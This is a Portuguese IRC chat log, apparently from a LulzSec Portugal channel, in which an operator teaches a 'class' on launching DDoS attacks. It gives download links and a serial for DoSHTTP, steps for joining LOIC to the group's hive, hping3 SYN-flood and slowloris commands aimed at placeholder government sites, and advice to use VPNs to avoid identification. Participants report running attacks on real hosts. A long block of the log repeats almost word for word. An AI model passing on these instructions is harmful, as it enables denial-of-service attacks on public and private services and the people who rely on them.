  498. <c0ldc0d3r> joao_, já digo para quem tem linux.
  499. * Gunp0wd3rPl0t saiu (Ping timeout: 121 seconds)
  500. <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
  501. * l4m8d4 saiu (*.net *.split)
  502. * wokmaster saiu (*.net *.split)
  503. <c0ldc0d3r> poderão*
  504. <c0ldc0d3r> Agora, para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
  505. * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
  506. <tuga> pergunta: qual é o site que está a ser vitima entao?
  507. <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
  508. <AntiSecPT278> -.-
  509. <c0ldc0d3r> Caso a rede vá abaixo, mudem de --flood para -i u100
  510. <c0ldc0d3r> Dúvidas?
  511. <Marmelo> Sim
  512. <Marmelo> o que queres dizer com rede ?
  513. <c0ldc0d3r> a vossa própria "internet"
  514. <c0ldc0d3r> ou seja, se não conseguirem acessar o google por exemplo, devido ao ataque.
  515. <Marmelo> ok
  516. <c0ldc0d3r> para não estar a sob-carregar a rede, mudam de --flood para -i u100
  517. <c0ldc0d3r> olha depois mete isto tudo no pastebin e dá ao caravela..
  518. <mitsai> --- www.xxxxxxxxx.rcts.pt hping statistic ---
  519. <mitsai> 351986 packets transmitted, 0 packets received, 100% packet loss // Este site nao responde aos pedidos de ping.
  520. <Marmelo> ok ve se me lembras
  521. <Made> Pergunta: Servidores que usam CloudLinux, e a firewall não deixa fazer mais do que 3 requests por segundo essas ferramentas dão?
  522. <sc0rp> o loic sim da
  523. <c0ldc0d3r> Made, humm..
  524. <sc0rp> pois envia a informaçao dentro de uma unica coneção ao envez de criar multiplas ligaçoes
  525. <c0ldc0d3r> isso não serve de muito
  526. * Tsunamy_ (webchat@AN-1ob.9be.j12pk9.IP) entrou em #aula
  527. <c0ldc0d3r> mandar 3 requests por segundo..
  528. <c0ldc0d3r> nem faz muito sentido..
  529. <c0ldc0d3r> porém, poderás usar o slowloris
  530. * wokmaster (rooting@AN-pqc.tda.sh4ali.IP) entrou em #aula
  531. <c0ldc0d3r> http://ha.ckers.org/slowloris/slowloris.pl
  532. <sc0rp> bem era esse que me estava a referir
  533. <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
  534. <Made> não é mandar, a firewall é que não deixa fazer c0ldc0der
  535. <sc0rp> e nao o loic
  536. <c0ldc0d3r> depois é só fazer perl slowloris.pl -dns www.vitima.com -timeout 5
  537. <tuga> <~c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt |||| nao percebi esta parte :S
  538. <sc0rp> peço desculpa
  539. <c0ldc0d3r> tuga, essa parte é só para quem usar linux
  540. <c0ldc0d3r> usas linux?
  541. <tuga> ah ok
  542. <tuga> w vista
  543. <c0ldc0d3r> emt
  544. <tuga> nop
  545. <c0ldc0d3r> então fica-te pelo loic & DoSHTTP 2.5.1
  546. <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
  547. <tuga> sim, o loic ja fiz a cena de conectar, deu-me um IP, o dosHTTP também já registei o serial, mas agora o que faço?
  548. <c0ldc0d3r> emptydev, servidores disponíveis como assim? os da vítima?
  549. <emptydev> Yup.. DNS's...
  550. <Marmelo> Pergunta MUITO importante : Portanto para não saberem o nosso IP verdadeiro , ao usar algum desses programas teremos que usar um vpn ?
  551. * sh4d0wf40 (other@AN-uui.9t0.s1ct8s.IP) entrou em #aula
  552. <c0ldc0d3r> para verificar se o ataque está a causar impacto, é ir ao ping.eu/port-chk/ e colocar o site e a porta 80
  553. * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
  554. <c0ldc0d3r> Marmelo, sim, sempre ajuda mais usar vpn
  555. * Grep (Grep@AN-t3n.nat.sh4ali.IP) entrou em #aula
  556. <sc0rp> bem
  557. <emptydev> c0ldc0d3r, esse site não verifica só se a porta 80 está aberta?
  558. <c0ldc0d3r> sim, que é a porta do site.
  559. <tuga> dúvida: nós é que escolhemos um site qualquer para fazer o que estámos a fazer agora?
  560. <Marmelo> Pergunta : No loic existe algumas opçoes de ataque , que nao me lembro , penso que era HTTP , ...
  561. <c0ldc0d3r> o resto pouco interessa.
  562. <Marmelo> qual a melhor dessas
  563. <sc0rp> fiz um pequeno video de uma ferramenta de synflood, contudo nao derrubei nenhum site de proposito
  564. <c0ldc0d3r> tuga, sim.
  565. * neopunk (neopunk@AN-edd.acp.kbtmgr.IP) entrou em #aula
  566. <c0ldc0d3r> Marmelo, sim, há o http, tcp e o udp
  567. <sc0rp> penso que nao faz mal nenhum verem como se procede um attack
  568. <sc0rp> http://videobam.com/nDOqA
  569. <Marmelo> qual deles sera o melhor?
  570. <c0ldc0d3r> o tcp e o http..
  571. <c0ldc0d3r> porém, se for muita gente, o udp é muito bom.. pois causa impacto na rede toda..
  572. * Desligou (Ligação terminada no destino).
  573. FiSH: Chat in #aula will NOT be encrypted (no key found)
  574. * A conversar em #aula
  575. * ChanServ coloca o modo +q #aula c0ldc0d3r
  576. * ChanServ coloca o modo de operador a c0ldc0d3r
  577. <c0ldc0d3r> peço desculpa
  578. <c0ldc0d3r> tive um problema na rede
  579. <tuga> nao tou a perceber nada disto lol xD
  580. <Marmelo> np
  581. <sc0rp> é um pouco mais simplificado mas nao tem tantas opções
  582. <tuga> na boa
  583. * poptrolha (webchat@AN-j3o.6q6.l7icd1.IP) entrou em #aula
  584. <c0ldc0d3r> tuga, fizeste download das ferramentas?
  585. <sc0rp> wireshark
  586. <sc0rp> *
  587. * Caravela|Lulz (boh@caravela.lulz.pt) entrou em #aula
  588. * ChanServ coloca o modo +q #aula Caravela|Lulz
  589. * ChanServ coloca o modo de operador a Caravela|Lulz
  590. <Marmelo> ah ok entao o wireshark fica mais simples ne?
  591. <tuga> sim
  592. <sc0rp> estava a mudar o portatil de sitio
  593. <Made> DDos? :D
  594. <sc0rp> no
  595. <Marmelo> ok entao
  596. <AntiSecPT278> no wireshark tens filtros
  597. * PATRAOjhN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
  598. <sc0rp> é mais simples para quem entende o trafico e muito melhor para iniciantes, mas o etherape e muito mai facil de usar contudo a informação recebida do servidor nao e a mais detalhada
  599. <sh4d0wf40> pessoal peço desculpa incomudar..mas na outra sala está lá pessoal que queria assistir as aulas mas não dá para falar e avisar o pessoal..só o caravela é que é op
  600. * Caravela|Lulz coloca o modo +m #aula
  601. * ruicruz (ruicruz@AN-tic.j0n.g9g7iv.IP) entrou em #aula
  602. <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
  603. <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
  604. <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
  605. * AntiSecPT407 (webchat@AN-2ha.off.6qn8qq.IP) entrou em #aula
  606. <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
  607. * aula754 (558a3c21@AN-trk.ahu.7j6nol.IP) entrou em #aula
  608. * unkn0wn (unkn0wn@AN-g1c.sni.4imr8a.IP) entrou em #aula
  609. <c0ldc0d3r> para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
  610. <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
  611. <Marmelo> Relembro que usem vpn enquanto fazem isto!
  612. <c0ldc0d3r> Caravela|Lulz, vai colocando isso no pastebin que não estou para repetir mais vezes
  613. <c0ldc0d3r> Caravela|Lulz, colocas-te +m e agora as dúvidas lol?
  614. <Caravela|Lulz> duvidas façam em pvt
  615. <Caravela|Lulz> depois fazes copy paste aqui e respondes
  616. <Caravela|Lulz> para nao haver spam
  617. * kaos (webchat@AN-c5d.qud.arjsab.IP) entrou em #aula
  618. <c0ldc0d3r> pois, mas eu tenho o xchat cheio de redes e não dá-me jeito nenhum
  619. <Marmelo> caravela estava a ir bem
  620. <Caravela|Lulz> ok
  621. * Caravela|Lulz coloca o modo -m #aula
  622. <Marmelo> ok alguma pergunta?
  623. * c0ldc0d3r coloca o modo de operador a mitsai
  624. * c0ldc0d3r oferece voz a mitsai
  625. <Marmelo> Relembro que quem fizer spam leva ban imediato
  626. * jgut (529ab6c4@AN-trk.ahu.7j6nol.IP) entrou em #aula
  627. <tuga> sim
  628. <Caravela|Lulz> faz me um copy paste do log até agora para eu depois guardar em pastebin
  629. <c0ldc0d3r> paste onde?
  630. <tuga> coldcoder, já diz tudo até tu onde disses-te, e agora?
  631. <c0ldc0d3r> piratepad?
  632. <jgut> nights a tds
  633. <c0ldc0d3r> tuga, agora é guardar tudo e amanhã colocarás em ação.
  634. * PATRAOjhN agora chama-se afk_johnnyPATRAODANET
  635. <Marmelo> lol ja acabou a aula?
  636. <sc0rp> lol
  637. * Hikas (5998a3a5@AN-k5k.v7s.hin4td.IP) entrou em #aula
  638. * jpir (webchat@AN-he6.c2p.6om10t.IP) entrou em #aula
  639. <c0ldc0d3r> Marmelo, não há muito à dizer..
  640. <Marmelo> pois nao lol
  641. * jgut saiu (Quit: http://www.mibbit.com ajax IRC Client)
  642. <tuga> amanha? mas escolho um site que eu quiser? tenho de começar a fazer o ataque hoje e deixar a noite toda o pc ligado?
  643. * Kondoriano (marco@AN-6rp.b7j.od2i7s.IP) entrou em #aula
  644. <c0ldc0d3r> agora é saber se o pessoal entendou..
  645. * MaP05 (MaP05@AN-qbn.nlh.vg3fe8.IP) entrou em #aula
  646. <c0ldc0d3r> já vi que alguém conectou o loic ao hive..
  647. <c0ldc0d3r> 2 pessoas
  648. <trolololguy_> uma pergunta
  649. <Made> c0ldc0der tens é de fazer ai uma auma de sqli
  650. <AntiSecPT278> O tuga está com fé de ir dentro
  651. * anarchy (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
  652. <Made> *uma
  653. <Grep> c0ldc0d3r, para linux o LOIC é igual?
  654. <trolololguy_> disseste anteriormente q udp era mais eficaz
  655. <trolololguy_> podes dizer pq?
  656. <Marmelo> LOIC nao da no linux
  657. <trolololguy_> sr professor?
  658. <c0ldc0d3r> Grep, sim
  659. <c0ldc0d3r> é mais complicado
  660. <c0ldc0d3r> mas não recomendo loic para linux..
  661. <c0ldc0d3r> hping3 é mil vezes melhor
  662. <Kondoriano> já começou?
  663. <Marmelo> ah my bad pensava que o loic nao dava para o linux
  664. <mitsai> sim mt melhor
  665. <Grep> ok isso já tenho ;) como vi a falar de ligar a um irc...
  666. <Grep> Marmelo, dar dá... com wine :P
  667. <Marmelo> <trolololguy_> disseste anteriormente q udp era mais eficaz
  668. * Cereal_Killer (webchat@AN-opo.t9n.1tveis.IP) entrou em #aula
  669. <c0ldc0d3r> Caravela|Lulz, onde queres que faça paste do log?
  670. * emptydev- (a@AN-928.r71.7am7ru.IP) entrou em #aula
  671. <emptydev-> Caravela|Lulz
  672. <emptydev-> PVT
  673. * dgrdfg (unknown@AN-7rh.t6k.0dagnm.IP) entrou em #aula
  674. <emptydev-> http://pastebin.com/TfnBWewg
  675. <emptydev-> Vejam
  676. * fx (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
  677. <c0ldc0d3r> emptydev, boa.
  678. * beh (boh@AN-us8.nsn.ovi93d.IP) entrou em #aula
  679. * c0ldc0d3r mudou o tópico para: Aula de hoje resumida: http://pastebin.com/TfnBWewg
  680. <dgrdfg> estava eu dizendo que deveria haver um sitio pra podermos colocar duvidas e que deviamos elaborar uma faq
  681. <dgrdfg> visto que as duvidas são mais que muitas
  682. <c0ldc0d3r> dgrdfg, poderás colocar aqui
  683. <dgrdfg> e muitas questões são constantemente respondidas
  684. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  685. <dgrdfg> tipo sempre o msm
  686. * An0nf40 (other@AN-i37.9oq.2s61dc.IP) entrou em #aula
  687. <beh> bem pensado
  688. * inetking saiu (Ping timeout: 121 seconds)
  689. * fx agora chama-se inetking
  690. <c0ldc0d3r> podem usar este canal para ajuda..
  691. <c0ldc0d3r> é na boa..
  692. <dgrdfg> c0m0 3h k x3 h@k@ u Fb| ?
  693. * jhNNN (jhN@AN-bfv.2ld.0kq3fr.IP) entrou em #aula
  694. <dgrdfg> por exemplo
  695. <dgrdfg> tenho uma duvida
  696. * emptydev saiu (Ping timeout: 121 seconds)
  697. * MaP05 saiu (Ping timeout: 122 seconds)
  698. * l4m8d4_ (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
  699. <dgrdfg> porque é que com algumas VPN's n consigo aceder a determinados sites
  700. * Funho saiu (Ping timeout: 121 seconds)
  701. <dgrdfg> ou servers
  702. <dgrdfg> e como evitar que isso aconteça
  703. * anarchy saiu (Ping timeout: 121 seconds)
  704. <Grep> c0ldc0d3r, aquele site ping.eu n é melhor o nmap ?
  705. * dgrdfg agora chama-se anarchy
  706. <c0ldc0d3r> isso tem haver com o policy que eles têm contra abusos do serviço..
  707. * AntiSecPT570 (webchat@AN-t76.bhi.3kcki8.IP) entrou em #aula
  708. <tuga> coldcoder, quanto tiveres tempo, se tiveres tempo e se fizeres o favor de me contactar, por favor contacta-me em pvt, obrigado
  709. <c0ldc0d3r> tens que usar outra vpn e de preferência fora da europa.
  710. <Made> amanha há aula?
  711. <anarchy> pois foi o que eu pensei
  712. <anarchy> há que pagar :F
  713. <c0ldc0d3r> Grep, o nmap verifica com o teu ip
  714. * VenusProject saiu (Ping timeout: 121 seconds)
  715. <c0ldc0d3r> o ping.eu não.
  716. <anarchy> mas há vpn's que têm ports fechadas?
  717. <c0ldc0d3r> tuga, ok
  718. * ruicruz saiu (Ping timeout: 127 seconds)
  719. * afk_johnnyPATRAODANET saiu (Ping timeout: 127 seconds)
  720. * kaos saiu (Quit: Page closed)
  721. <Grep> Grep, com o proxychains não, pois não? pelo menos pelo que li :S
  722. * Kondoriano saiu (Ping timeout: 129 seconds)
  723. * aula754 saiu (Ping timeout: 128 seconds)
  724. * sc0rp saiu (Ping timeout: 129 seconds)
  725. <c0ldc0d3r> proxychains poderá resultar...
  726. <c0ldc0d3r> é uma questão de verificar
  727. * w4r10ck saiu (Quit: )
  728. * Hikas saiu (Ping timeout: 132 seconds)
  729. * Caravela|Lulz saiu (Ping timeout: 125 seconds)
  730. * l4m8d4 saiu (Ping timeout: 131 seconds)
  731. * joao_ saiu (Ping timeout: 125 seconds)
  732. * Marmelo saiu (Ping timeout: 122 seconds)
  733. * trolololguy_ saiu (Ping timeout: 129 seconds)
  734. * mitsai saiu (Ping timeout: 125 seconds)
  735. * sh4d0wf40 saiu (Ping timeout: 157 seconds)
  736. * l4m8d4_ agora chama-se l4m8d4
  737. <Grep> tenho feito uns testes, obvio que é mais lento mas tem funcionado... mas é sempre bom haver outras soluções ;) já aprendi kk koisa
  738. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
  739. <emptydev-> Tinhamos ido para a quakenet, tinhamos + gente, e ninguem caia.
  740. <c0ldc0d3r> emptydev-, link.
  741. <c0ldc0d3r> que eu dou ao caravela
  742. <c0ldc0d3r> para por no twitter
  743. <Grep> só uma questão que eu cheguei a meio da aula...
  744. <tuga> c0ldc0d3r, é suposto no LOIC, em baixo em attack status aparecer muitas vezes a dizer failed? pq tenho uns 32.000
  745. <Grep> o hping3 substitui o DoSHTTP e o Loic certo?
  746. <c0ldc0d3r> é, isso significa que o servidor está deixando de responder.
  747. <c0ldc0d3r> Grep, sim.
  748. <An0nf40> tuga tu estás a fazer isso com uma vpn certo?
  749. <tuga> nao lool
  750. <An0nf40> ou estás simplesmente a testar sem nada lol
  751. <c0ldc0d3r> vpn é necessário, visto que somos poucos..
  752. <tuga> mas tipo
  753. <c0ldc0d3r> se fosse tipo 2 mil e tal pessoas a colaborar.. era cagativo usar vpn no meio de tantos ips..
  754. <tuga> eu ponho em perigo outras pessoas?
  755. <c0ldc0d3r> mas como são poucos :\
  756. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  757. <aaaamitsai> +v +o
  758. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
  759. * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
  760. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  761. <tuga> mas eu nao testei num site do governo
  762. * aaaamitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) saiu de #aula
  763. * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  764. * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
  765. <An0nf40> não precisa ser do governo lol
  766. <mitsai> +v +o pl
  767. * emptydev- saiu (Ping timeout: 121 seconds)
  768. <An0nf40> eles dão mais importancia a esses...
  769. <tuga> sim, mas acho que uma escola eles nao dao importancia o.O xD
  770. <Grep> lol omg
  771. * DaGun (webchat@AN-a0h.8na.8e30u1.IP) entrou em #aula
  772. * An0nf40 agora chama-se sh4d0wf40
  773. <DaGun> boas, vao por a aula de hoje no pastebin?
  774. <tuga> ao desligar o ataque no LOIC o site volta imediatamente online certo?
  775. <DaGun> e que tava com problemas na net e perdi uma parte
  776. <DaGun> :S
  777. <sh4d0wf40> lolol
  778. <DaGun> xD
  779. <tuga> dagun, ja puseram penso eu
  780. <Made> DaGun http://pastebin.com/TfnBWewg]
  781. <DaGun> só?
  782. <c0ldc0d3r> tuga, sim e não.
  783. * LzKotha (webchat@AN-dft.gs0.hkmcdf.IP) entrou em #aula
  784. <c0ldc0d3r> se o impacto for muito grande.. o site poderá ficar off até haver assistência física.
  785. <DaGun> é que eu isso apanhei xD
  786. * MovingForward (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
  787. <tuga> ah ok
  788. <mitsai> +v +o pls
  789. <Made> Ao usar uma vpn, a vnp não fica com os meus dados no log?
  790.  
  791. * w4r10ck (webchat@AN-ivc.474.m6tpja.IP) entrou em #aula
  792. * Marmelo (marmelo@lulzsecportugal.com) entrou em #aula
  793. <Marmelo> boas
  794. <c0ldc0d3r> boas
  795. <AntiSecPT278> broas
  796. <AntiSecPT278> xD
  797. <Marmelo> c0ld voz me plss?
  798. <Marmelo> olha que sacrificio
  799. <Marmelo> estava eu a jogar
  800. * c0ldc0d3r oferece voz a Marmelo
  801. <Marmelo> e sai do windows so para vir para aqui
  802. <Marmelo> tas a ver lol
  803. * VenusProject (VenusProje@AN-md1.ic0.l1e4n7.IP) entrou em #aula
  804. * w4r10ck saiu (Ping timeout: 121 seconds)
  805. * Dagun (webchat@AN-mif.uvq.rloiam.IP) entrou em #aula
  806. * inetking (fx@AN-ks2.pjq.4nimkf.IP) entrou em #aula
  807. <Dagun> boas
  808. * mitsai (mitsai@AN-jpu.s6r.q8mj9u.IP) entrou em #aula
  809. * MikeZ (webchat@AN-fs7.uas.g29tu8.IP) entrou em #aula
  810. * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
  811. * bl4ck (webchat@AN-f49.isc.j12pk9.IP) entrou em #aula
  812. * w4r10ck (webchat@AN-vv8.k64.45hl4i.IP) entrou em #aula
  813. * sc0rp (sc0rp@127.0.0.1) entrou em #aula
  814. * joao_ (joao@AN-j69.rhd.6cqjs0.IP) entrou em #aula
  815. * AntiSecPT594 (webchat@AN-3rl.a7v.g29tu8.IP) entrou em #aula
  816. * Made (webchat@AN-q7o.pmt.arjsab.IP) entrou em #aula
  817. * trolololguy_ (trolololguy__@AN-ter.ilk.h3nreq.IP) entrou em #aula
  818. * JojO1z (webchat@AN-gc1.4mh.hqmp6l.IP) entrou em #aula
  819. <c0ldc0d3r> Então pessoal, tudo bem com vocês?
  820. <Marmelo> c0ld é melhor fazeres +m acho que é isso
  821. <c0ldc0d3r> hum?
  822. <Marmelo> eu estou +/-
  823. <c0ldc0d3r> podes ir jogar lol
  824. <wokmaster> could be better
  825. <wokmaster> :)
  826. <Marmelo> tipo estou a dizer para bloquares o chat daqui a um bocado
  827. * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
  828. <c0ldc0d3r> népia
  829. * emptydev (a@emptydev.google.suck.it) entrou em #aula
  830. <c0ldc0d3r> senão como vão tirar dúvidas?
  831. <emptydev> Que cena :o
  832. <Marmelo> a sim por pvt pah
  833. <Marmelo> como ontem
  834. <Marmelo> senao é uma confusao ...
  835. <c0ldc0d3r> pvt o cr** que não vou estar a responder um a um.
  836. <Made> o prof tá atrasado 7 min bora bazar xD
  837. * Funho (Funho@AN-hf8.a49.qoipr8.IP) entrou em #aula
  838. <Marmelo> lol Made
  839. <c0ldc0d3r> Made, hahah
  840. <Made> :D
  841. <mitsai> é aqui
  842. <mitsai> +v
  843. <mitsai> pl
  844. <c0ldc0d3r> Mais uns 2 minutos e começamos.
  845. <Marmelo> mas olha tamos tipo a explicar
  846. <Marmelo> e vai vir um otario a fazer spam
  847. <c0ldc0d3r> leva ban.
  848. <Marmelo> se for como ontem 100+ pessoas
  849. <Marmelo> imagina
  850. <c0ldc0d3r> não vai ser lol
  851. <c0ldc0d3r> irc está tudo mamado
  852. <Marmelo> lol
  853. <Marmelo> isso é bom entao lol
  854. <AntiSecPT278> é neste ou no anonnet.org?
  855. <c0ldc0d3r> é aqui a aula.
  856. <AntiSecPT278> felizmente
  857. <AntiSecPT278> o outro está péssimo
  858. <c0ldc0d3r> ok, vamos dar início.
  859. <w4r10ck> c0ld é que ta bue pessoal no anonnet
  860. <AntiSecPT278> deviam actualizar o twitter com o correcto
  861. <c0ldc0d3r> w4r10ck, tem que ser neste...
  862. <w4r10ck> yah yah tb acho melhor o outro server ta uma lastima
  863. * krak-chevaliers saiu (Ping timeout: 121 seconds)
  864. * tuga (webchat@AN-iuq.ep7.6cqjs0.IP) entrou em #aula
  865. <c0ldc0d3r> vão ser necessárias 2 ferramentas para os ataques DDoS
  866. <c0ldc0d3r> para quem usa window$ claro.
  867. <tuga> a aula já começou á muito? :/
  868. <c0ldc0d3r> 1º DoSHTTP 2.5.1 LINK: http://www.socketsoft.net/download/doshttp_setup.exe Serial: dh10a-0064-5612-1234-37b5-9701
  869. <c0ldc0d3r> tuga, acabou de começar.
  870. <Marmelo> lol ainda nao começou praticamente
  871. <Marmelo> vamos la
  872. <Marmelo> Apartir de agora so podem mandar uma mensagem de cada vez e tem que ser uma questao ou algo importante
  873. <c0ldc0d3r> 2º LOIC LINK: http://sourceforge.net/projects/hivemindloic/files/latest/download
  874. <Marmelo> Pergunta : E o GoodBye?
  875. <c0ldc0d3r> No caso do LOIC não é necessário instalar, é só fazer download e executar, depois onde diz IRC Server, colocam irc.freshirc.com e onde diz channel, colocam #lulzsecportugal, de seguida após isso, clicam em "Fucking hive mode" salvo erro.
  876. <joao_> e quem tem linux ?
  877. <c0ldc0d3r> Marmelo, goodbye não é muito seguro.. ele crasha a meio do ataque.
  878. <c0ldc0d3r> joao_, já digo para quem tem linux.
  879. * Gunp0wd3rPl0t saiu (Ping timeout: 121 seconds)
  880. <c0ldc0d3r> no caso do DoSHTTP 2.5.1, é só abrir após instalar, e onde diz Target URL: colocam o site que está a ser vítima, e o resto poderam deixar igual.
  881. * l4m8d4 saiu (*.net *.split)
  882. * wokmaster saiu (*.net *.split)
  883. <c0ldc0d3r> poderão*
  884. <c0ldc0d3r> Agora, para quem usa Linux, é só instalar o hping3, abrindo um terminal e instalando da seguinte forma: sudo apt-get install hping3
  885. * l4m8d4 (l4m8d4@AN-vhb.75t.gjjh6q.IP) entrou em #aula
  886. <tuga> pergunta: qual é o site que está a ser vitima entao?
  887. <c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt
  888. <AntiSecPT278> -.-
  889. <c0ldc0d3r> Caso a rede vá abaixo, mudem de --flood para -i u100
  890. <c0ldc0d3r> Dúvidas?
  891. <Marmelo> Sim
  892. <Marmelo> o que queres dizer com rede ?
  893. <c0ldc0d3r> a vossa própria "internet"
  894. <c0ldc0d3r> ou seja, se não conseguirem acessar o google por exemplo, devido ao ataque.
  895. <Marmelo> ok
  896. <c0ldc0d3r> para não estar a sob-carregar a rede, mudam de --flood para -i u100
  897. <c0ldc0d3r> olha depois mete isto tudo no pastebin e dá ao caravela..
  898. <mitsai> --- www.xxxxxxxxx.rcts.pt hping statistic ---
  899. <mitsai> 351986 packets transmitted, 0 packets received, 100% packet loss // Este site nao responde aos pedidos de ping.
  900. <Marmelo> ok ve se me lembras
  901. <Made> Pergunta: Servidores que usam CloudLinux, e a firewall não deixa fazer mais do que 3 requests por segundo essas ferramentas dão?
  902. <sc0rp> o loic sim da
  903. <c0ldc0d3r> Made, humm..
  904. <sc0rp> pois envia a informaçao dentro de uma unica coneção ao envez de criar multiplas ligaçoes
  905. <c0ldc0d3r> isso não serve de muito
  906. * Tsunamy_ (webchat@AN-1ob.9be.j12pk9.IP) entrou em #aula
  907. <c0ldc0d3r> mandar 3 requests por segundo..
  908. <c0ldc0d3r> nem faz muito sentido..
  909. <c0ldc0d3r> porém, poderás usar o slowloris
  910. * wokmaster (rooting@AN-pqc.tda.sh4ali.IP) entrou em #aula
  911. <c0ldc0d3r> http://ha.ckers.org/slowloris/slowloris.pl
  912. <sc0rp> bem era esse que me estava a referir
  913. <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
  914. <Made> não é mandar, a firewall é que não deixa fazer c0ldc0der
  915. <sc0rp> e nao o loic
  916. <c0ldc0d3r> depois é só fazer perl slowloris.pl -dns www.vitima.com -timeout 5
  917. <tuga> <~c0ldc0d3r> e após instalar, fazer hping3 -S -s 80 -p 80 --flood www.vitima.gov.pt |||| nao percebi esta parte :S
  918. <sc0rp> peço desculpa
  919. <c0ldc0d3r> tuga, essa parte é só para quem usar linux
  920. <c0ldc0d3r> usas linux?
  921. <tuga> ah ok
  922. <tuga> w vista
  923. <c0ldc0d3r> emt
  924. <tuga> nop
  925. <c0ldc0d3r> então fica-te pelo loic & DoSHTTP 2.5.1
  926. <emptydev> Pergunta: Como sabemos os servidores disponíveis, e como sabemos a resposta deles aos pedidos?
  927. <tuga> sim, o loic ja fiz a cena de conectar, deu-me um IP, o dosHTTP também já registei o serial, mas agora o que faço?
  928. <c0ldc0d3r> emptydev, servidores disponíveis como assim? os da vítima?
  929. <emptydev> Yup.. DNS's...
  930. <Marmelo> Pergunta MUITO importante : Portanto para não saberem o nosso IP verdadeiro , ao usar algum desses programas teremos que usar um vpn ?
  931. * sh4d0wf40 (other@AN-uui.9t0.s1ct8s.IP) entrou em #aula
  932. <c0ldc0d3r> para verificar se o ataque está a causar impacto, é ir ao ping.eu/port-chk/ e colocar o site e a porta 80
  933. * krak-chevaliers (webchat@AN-gli.28s.afqfns.IP) entrou em #aula
  934. <c0ldc0d3r> Marmelo, sim, sempre ajuda mais usar vpn
  935. * Grep (Grep@AN-t3n.nat.sh4ali.IP) entrou em #aula
  936. <sc0rp> bem
  937. <emptydev> c0ldc0d3r, esse site não verifica só se a porta 80 está aberta?
  938. <c0ldc0d3r> sim, que é a porta do site.
  939. <tuga> dúvida: nós é que escolhemos um site qualquer para fazer o que estámos a fazer agora?
  940. <Marmelo> Pergunta : No loic existe algumas opçoes de ataque , que nao me lembro , penso que era HTTP , ...
  941. <c0ldc0d3r> o resto pouco interessa.
  942. <Marmelo> qual a melhor dessas
  943. <sc0rp> fiz um pequeno video de uma ferramenta de synflood, contudo nao derrubei nenhum site de proposito
  944. <c0ldc0d3r> tuga, sim.
  945. * neopunk (neopunk@AN-edd.acp.kbtmgr.IP) entrou em #aula
  946. <c0ldc0d3r> Marmelo, sim, há o http, tcp e o udp
  947. <sc0rp> penso que nao faz mal nenhum verem como se procede um attack
  948. <sc0rp> http://videobam.com/nDOqA
  949. <Marmelo> qual deles sera o melhor?
  950. <c0ldc0d3r> o tcp e o http..
  951. <c0ldc0d3r> porém, se for muita gente, o udp é muito bom.. pois causa impacto na rede toda..
  952. * Desligou (Ligação terminada no destino).
  953. FiSH: Chat in #aula will NOT be encrypted (no key found)
  954. * A conversar em #aula
  955. * ChanServ coloca o modo +q #aula c0ldc0d3r
  956. * ChanServ coloca o modo de operador a c0ldc0d3r
  957. <c0ldc0d3r> peço desculpa
  958. <c0ldc0d3r> tive um problema na rede
  959. <tuga> nao tou a perceber nada disto lol xD
  960. <Marmelo> np
  961. <sc0rp> é um pouco mais simplificado mas nao tem tantas opções
  962. <tuga> na boa
  963. * poptrolha (webchat@AN-j3o.6q6.l7icd1.IP) entrou em #aula
  964. <c0ldc0d3r> tuga, fizeste download das ferramentas?
  965. <sc0rp> wireshark
  966. <sc0rp> *
  967. * Caravela|Lulz (boh@caravela.lulz.pt) entrou em #aula
  968. * ChanServ coloca o modo +q #aula Caravela|Lulz
  969. * ChanServ coloca o modo de operador a Caravela|Lulz
  970. <Marmelo> ah ok entao o wireshark fica mais simples ne?
  971. <tuga> sim
  972. <sc0rp> estava a mudar o portatil de sitio
  973. <Made> DDos? :D
  974. <sc0rp> no
  975. <Marmelo> ok entao
  976. <AntiSecPT278> no wireshark tens filtros
